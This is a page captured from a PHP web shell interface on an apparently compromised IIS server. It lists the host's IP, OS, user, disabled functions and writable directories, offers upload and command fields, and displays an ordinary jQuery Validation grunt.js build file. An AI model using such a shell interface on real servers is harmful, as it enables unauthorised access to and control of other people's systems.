403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.217.154
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/business/applynow_DONE/theme/scripts/jquery-validation/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/inetpub/wwwroot/business/applynow_DONE/theme/scripts/jquery-validation//grunt.js
/*global config:true, task:true*/
module.exports = function(grunt) {

grunt.initConfig({
	pkg: '<json:package.json>',
	meta: {
		banner: '/*! <%= pkg.title || pkg.name %> - v<%= pkg.version %> - ' +
			'<%= grunt.template.today("m/d/yyyy") %>\n' +
			'<%= pkg.homepage ? "* " + pkg.homepage + "\n" : "" %>' +
			'* Copyright (c) <%= grunt.template.today("yyyy") %> <%= pkg.author.name %>;' +
			' Licensed <%= _.pluck(pkg.licenses, "type").join(", ") %> */'
	},
	concat: {
		'dist/jquery.validate.js': ['<banner>', '<file_strip_banner:jquery.validate.js>'],
		'dist/additional-methods.js': ['<banner>', '<file_strip_banner:additional-methods.js>']
	},
	min: {
		'dist/jquery.validate.min.js': ['<banner>', 'dist/jquery.validate.js'],
		'dist/additional-methods.min.js': ['<banner>', 'dist/additional-methods.js']
	},
	zip: {
		dist: {
			src: [
				'dist/additional-methods.js',
				'dist/additional-methods.min.js',
				'dist/jquery.validate.js',
				'dist/jquery.validate.min.js',
				'README.md',
				'changelog.txt',
				'grunt.js',
				'package.json',
				'demo/**/*.*',
				'lib/**/*.*',
				'localization/**/*.*',
				'test/**/*.*'
			],
			dest: 'dist/<%= pkg.name %>-<%= pkg.version %>.zip'
		}
	},
	qunit: {
		files: ['test/index.html']
	},
	lint: {
		files: ['jquery.validate.js']
	},
	jshint: {
		options: {
			curly: true,
			eqeqeq: true,
			immed: true,
			latedef: true,
			newcap: true,
			noarg: true,
			sub: true,
			undef: true,
			eqnull: true,
			browser: true
		},
		globals: {
			jQuery: true,
			$: true,
			console: true
		}
	}
});

grunt.registerMultiTask('zip', 'Create a zip file for release', function() {
	var files = grunt.file.expand(this.file.src);
	// grunt.log.writeln(require('util').inspect(files));
	grunt.log.writeln("Creating zip file " + this.file.dest);

	var done = this.async();

	var zipstream = require('zipstream');
	var fs = require('fs');

	var out = fs.createWriteStream(this.file.dest);
	var zip = zipstream.createZip({ level: 1 });

	zip.pipe(out);

	function addFile() {
		if (!files.length) {
			zip.finalize(function(written) {
				grunt.log.writeln(written + ' total bytes written');
				done();
			});
			return;
		}
		var file = files.shift();
		grunt.log.verbose.writeln('Zipping ' + file);
		zip.addFile(fs.createReadStream(file), { name: file }, addFile);
	}
	addFile();
});

grunt.registerTask('default', 'lint qunit');
grunt.registerTask('release', 'default concat min zip');

};

Youez - 2016 - github.com/yon3zu
LinuXploit